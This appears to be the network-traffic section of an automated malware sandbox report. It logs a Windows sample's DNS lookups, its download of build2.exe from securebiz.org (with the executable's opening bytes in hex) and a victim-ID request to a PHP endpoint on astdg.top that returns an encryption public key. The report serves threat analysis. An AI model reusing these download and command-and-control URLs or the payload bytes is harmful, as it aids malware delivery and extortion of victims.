                                                                                                                                                                                                    Aug 30, 2021 10:14:31.217510939 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.217545033 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218082905 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218209028 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218586922 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218800068 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218928099 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218955040 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.218986034 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.219031096 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.221201897 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.221235037 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.221374989 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.221471071 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222325087 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222357988 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222376108 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222404003 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222429991 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222539902 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222552061 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.222559929 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.223254919 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.223337889 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224045992 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224129915 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224196911 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224219084 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224251986 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224291086 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224776030 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224806070 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224821091 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224841118 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224881887 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.224967957 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.250447989 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.305877924 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:15:12.351576090 CEST49709443192.168.2.377.123.139.190

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Aug 30, 2021 10:14:03.559395075 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:03.594041109 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:12.936909914 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.006443977 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.183618069 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.219460011 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.699623108 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.712418079 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.805201054 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.560985088 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.596411943 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:28.939924002 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                                                    Aug 30, 2021 10:14:28.973310947 CEST53583618.8.8.8192.168.2.3

                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.271483898 CEST192.168.2.38.8.8.8d08c(Port unreachable)Destination Unreachable

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                    Aug 30, 2021 10:14:12.936909914 CEST192.168.2.38.8.8.80xc85Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.183618069 CEST192.168.2.38.8.8.80xfdb9Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.699623108 CEST192.168.2.38.8.8.80x781eStandard query (0)securebiz.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.712418079 CEST192.168.2.38.8.8.80x7f03Standard query (0)astdg.topA (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.805201054 CEST192.168.2.38.8.8.80x7f03Standard query (0)astdg.topA (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.560985088 CEST192.168.2.38.8.8.80x4306Standard query (0)api.2ip.uaA (IP address)IN (0x0001)

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.006443977 CEST8.8.8.8192.168.2.30xc85No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.219460011 CEST8.8.8.8192.168.2.30xfdb9No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org203.228.9.102A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org190.219.225.108A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org183.78.205.92A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org179.38.78.22A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org178.30.64.85A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org183.100.39.157A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org37.75.44.24A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org211.170.70.237A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org88.158.247.38A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.892026901 CEST8.8.8.8192.168.2.30x781eNo error (0)securebiz.org115.88.24.202A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top94.190.187.102A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top91.203.174.38A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top222.236.49.124A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top46.10.64.191A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top37.34.248.24A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top181.62.1.142A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top106.243.14.107A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top87.119.100.220A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.177417040 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.596411943 CEST8.8.8.8192.168.2.30x4306No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top87.119.100.220A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top109.98.58.98A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top94.190.187.102A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top91.203.174.38A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top222.236.49.124A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top46.10.64.191A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top211.40.39.251A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top37.34.248.24A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top181.62.1.142A (IP address)IN (0x0001)
                                                                                                                                                                                                    Aug 30, 2021 10:14:20.269555092 CEST8.8.8.8192.168.2.30x7f03No error (0)astdg.top106.243.14.107A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • securebiz.org
                                                                                                                                                                                                    • astdg.top

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.349710203.228.9.10280C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Aug 30, 2021 10:14:18.155529022 CEST1059OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                    Host: securebiz.org
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.268672943 CEST1061INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Aug 2021 08:14:18 GMT
                                                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                                                                                                                                    Last-Modified: Sun, 29 Aug 2021 14:56:13 GMT
                                                                                                                                                                                                    ETag: "94600-5cab3eaf5b635"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 607744
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f 0c 29 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 08 00 00 58 96 01 00 00 00 00 2f 22 00 00 00 10 00 00 00 50 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 9e 01 00 04 00 00 47 72 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 85 08 00 3c 00 00 00 00 60 9d 01 40 ab 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 52 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 6e 08 00 18 00 00 00 60 6e 08 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 08 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c9 35 08 00 00 10 00 00 00 36 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 3f 00 00 00 50 08 00 00 40 00 00 00 3a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c5 94 01 00 90 08 00 00 20 00 00 00 7a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 ab 00 00 00 60 9d 01 00 ac 00 00 00 9a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 57 8b f9 6a 00 8d 4d fc e8 20 07 00 00 8b 47 04 85 c0 76 09 83 f8 ff 73 04 48 89 47 04 8b 77
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)_6X/"P@Gr<`@ Rn`n@P.text56 `.rdata?P@:@@.data\ z@.rsrc@`@@UQVWjM GvsHGw
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.268706083 CEST1062INData Raw: 04 f7 de 1b f6 f7 d6 8d 4d fc 23 f7 e8 25 07 00 00 5f 8b c6 5e c9 c3 8b 09 85 c9 74 11 e8 ba ff ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 c3 81 00 47 86 c8 61 c3 c1 e0 04 89 01 c3 31 08 c3 33 44 24 04 c2 04 00 81 00 cc 36 ef c6 c3 29 08 c3 01 08
                                                                                                                                                                                                    Data Ascii: M#%_^ttjGa13D$6)UT,ES@V3=C4WEu8VPVhLlHVVPHEPVVPH(PHEPVEPVhPH=CNuuVPVHEHEE]ET=C
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557136059 CEST1065INData Raw: 56 ff 15 08 50 48 00 56 8d 85 00 f8 ff ff 50 ff 15 1c 50 48 00 4f 75 da 5f 5e c9 c3 b8 53 45 48 00 e8 84 2f 08 00 81 ec 70 08 00 00 83 3d d4 43 dd 01 0c 56 57 75 0d 6a 00 ff 15 7c 50 48 00 e8 c8 06 00 00 bf 56 7d 09 00 33 f6 83 3d d4 43 dd 01 65
                                                                                                                                                                                                    Data Ascii: VPHVPPHOu_^SEH/p=CVWuj|PHV}3=CeuhnHhHnHPHPVVPHOulHChHXPH=VVVPTPHVPHVVPHVVPVVHPHP<PHEPVVVVVPHPHVQH
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557179928 CEST1066INData Raw: f4 b3 48 00 ff 15 00 51 48 00 85 c0 75 16 e8 d0 07 00 00 8b f0 ff 15 fc 50 48 00 50 e8 80 07 00 00 89 06 59 e8 60 31 00 00 c3 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 f0 32 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13
                                                                                                                                                                                                    Data Ascii: HQHuPHPY`1UQeVEPuu2u9EttM^UEtH]U($H3ESjLjP(0,ff
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557199001 CEST1068INData Raw: 08 e8 fc fd ff ff 33 db 43 83 7d 10 00 74 08 6a 08 e8 20 20 00 00 59 c3 e8 32 2c 00 00 c3 8b ff 55 8b ec 6a 00 6a 00 ff 75 08 e8 c3 fe ff ff 83 c4 0c 5d c3 8b ff 55 8b ec 6a 00 6a 01 ff 75 08 e8 ad fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 9d
                                                                                                                                                                                                    Data Ascii: 3C}tj Y2,Ujju]Ujju]jjjjjjV0V:V,:VV:V9VV8Vzh @#0$H^U=Hu|uh'YY]jXhH+3uE
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.557223082 CEST1069INData Raw: 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 4b 4c 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff
                                                                                                                                                                                                    Data Ascii: d=];d_^[USVWE3PPPuuuuuKL E_^[E]UVuN3jVvvjuvuL ^]U8S}#u:&@M3@eEf&@$HM3EEEEEEEE EeeeemdE
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814438105 CEST1078INData Raw: c7 10 ff 4d 08 75 c7 56 e8 e1 ef ff ff 59 5f 5e 5b 5d c3 8b ff 55 8b ec 53 56 8b 35 d4 50 48 00 57 8b 7d 08 57 ff d6 8b 87 b0 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00
                                                                                                                                                                                                    Data Ascii: MuVY_^[]USV5PHW}WtPtPtPtP_PE{@HttP{tCtPMuP_^[]UW}SV5PHWtPtPtPtP
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814568996 CEST1079INData Raw: cc 00 00 eb 11 50 e8 e1 0e 00 00 59 3b c3 74 09 c7 00 dd dd 00 00 83 c0 08 89 45 f4 eb 03 89 5d f4 39 5d f4 0f 84 3e 01 00 00 57 ff 75 f4 ff 75 14 ff 75 10 6a 01 ff 75 20 ff d6 85 c0 0f 84 e3 00 00 00 8b 35 b4 50 48 00 53 53 57 ff 75 f4 ff 75 0c
                                                                                                                                                                                                    Data Ascii: PY;tE]9]>Wuuuju 5PHSSWuuuM;Et)9];MuuWuuu;~Ej3Xr9D=wZS;tjPY;t3;tAuVWuuu
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814593077 CEST1080INData Raw: 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 80 35 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24
                                                                                                                                                                                                    Data Ascii: #GFGr$5@F#GFGFGV$5@I45@<5@D5@L5@T5@\5@d5@w5@DDDDDDDDDDDDDD$5@5@5@5@5@E^_FGE^_IFG
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814620972 CEST1082INData Raw: 00 8d 45 f8 50 8d 34 fd 44 92 48 00 ff 36 e8 c9 e8 ff ff 59 50 ff 36 53 ff 15 28 51 48 00 5f 5e 5b c9 c3 6a 03 e8 ce 4e 00 00 59 83 f8 01 74 15 6a 03 e8 c1 4e 00 00 59 85 c0 75 1f 83 3d a8 90 48 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00
                                                                                                                                                                                                    Data Ascii: EP4DH6YP6S(QH_^[jNYtjNYu=Huh)hYYUWVuM};v;r=CtWV;^_u^_]dJur*$;@r$:@$;@$X;@:@;@8;@
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.814646006 CEST1083INData Raw: 00 00 00 33 c0 5e 5d c3 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 34 51 48 00 a3 f4 b3 48 00 85 c0 75 02 5d c3 33 c0 40 a3 3c 55 dd 01 5d c3 8b ff 56 57 33 f6 bf f8 b3 48 00 83 3c f5 0c 93 48 00 01 75 1e 8d 04 f5 08 93
                                                                                                                                                                                                    Data Ascii: 3^]U39EjhP4QHHu]3@<U]VW3H<HuH8h0YYtF$|3@_^$H3SPHVHW>t~tWW^&Y(H|H_t~uP(H|^[UE4HPH]j


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.168.2.34971194.190.187.10280C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.299650908 CEST1063OUTGET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true HTTP/1.1
                                                                                                                                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                    Host: astdg.top
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.447382927 CEST1063INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Aug 2021 08:13:49 GMT
                                                                                                                                                                                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                                                    X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                    Content-Length: 561
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 32 43 6f 6e 6e 6b 6d 48 66 33 46 35 55 59 78 74 73 6a 48 57 5c 5c 6e 53 69 4d 32 49 76 4c 74 76 76 34 4a 31 5c 2f 66 74 31 62 68 7a 30 65 73 62 41 71 59 2b 76 45 6b 43 73 5a 6b 30 31 58 4b 68 43 6d 67 6e 44 57 49 37 55 62 4a 52 48 70 65 31 4f 36 7a 34 41 55 6d 49 5c 5c 6e 44 6e 5a 6c 65 4e 6d 70 62 6a 63 6e 70 51 51 66 5c 2f 41 4a 73 6a 69 38 63 47 51 42 4e 37 4d 39 45 6d 6f 32 62 51 41 35 63 36 68 58 6b 76 6a 74 57 52 34 4d 34 76 6c 37 42 6a 59 4a 39 6a 74 4c 42 5c 5c 6e 56 50 48 62 6b 32 79 63 57 67 47 72 7a 4c 74 31 6f 4a 6a 63 67 36 77 71 44 61 6c 6f 78 62 53 67 59 50 54 6c 54 4b 4a 66 37 58 56 38 6d 6d 48 56 64 39 5c 2f 5a 5c 2f 4a 78 70 37 51 76 75 4c 62 77 32 5c 5c 6e 4e 6f 79 68 61 32 62 50 39 55 72 66 47 6e 51 46 72 75 71 4b 66 76 30 56 44 33 33 4f 2b 2b 44 5c 2f 6b 5c 2f 2b 58 58 71 68 54 4f 75 49 37 56 38 44 33 35 33 6c 4a 5c 2f 77 56 6a 51 39 47 4d 6c 53 38 64 5c 5c 6e 6c 72 39 42 50 35 45 6a 54 35 47 35 73 66 6d 46 52 75 67 53 67 32 76 49 78 32 41 66 64 6d 71 36 43 53 57 7a 47 44 65 61 36 61 6d 45 61 47 44 4a 42 65 45 4e 6e 77 38 66 64 47 63 6e 7a 50 4b 50 5c 5c 6e 74 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 35 56 50 45 49 6f 78 45 57 61 61 42 35 41 32 34 32 4c 47 52 35 4f 54 34 45 42 37 45 69 74 71 32 72 52 4b 31 4c 51 43 42 22 7d
